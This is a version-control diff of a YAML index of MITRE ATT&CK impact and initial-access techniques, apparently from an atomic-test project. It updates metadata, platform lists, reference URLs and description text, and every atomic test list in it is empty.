-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -57990,7 +58928,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58016,9 +58954,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58074,55 +59013,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58137,6 +59032,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58149,16 +59048,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58226,11 +59161,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58248,7 +59182,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58275,7 +59209,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -58325,13 +59259,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -58399,11 +59332,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -58468,13 +59400,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58552,7 +59483,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -58602,11 +59532,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58645,10 +59574,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -58665,7 +59594,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -58704,12 +59633,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58771,7 +59699,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -58788,7 +59716,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -58818,7 +59745,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -58832,7 +59759,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -58895,12 +59821,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -58975,7 +59900,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -58989,19 +59914,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59027,7 +59951,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59082,7 +60006,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59145,11 +60068,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59164,6 +60086,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -59172,18 +60095,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59215,14 +60138,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -59233,6 +60153,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -59241,22 +60166,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -59281,36 +60202,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
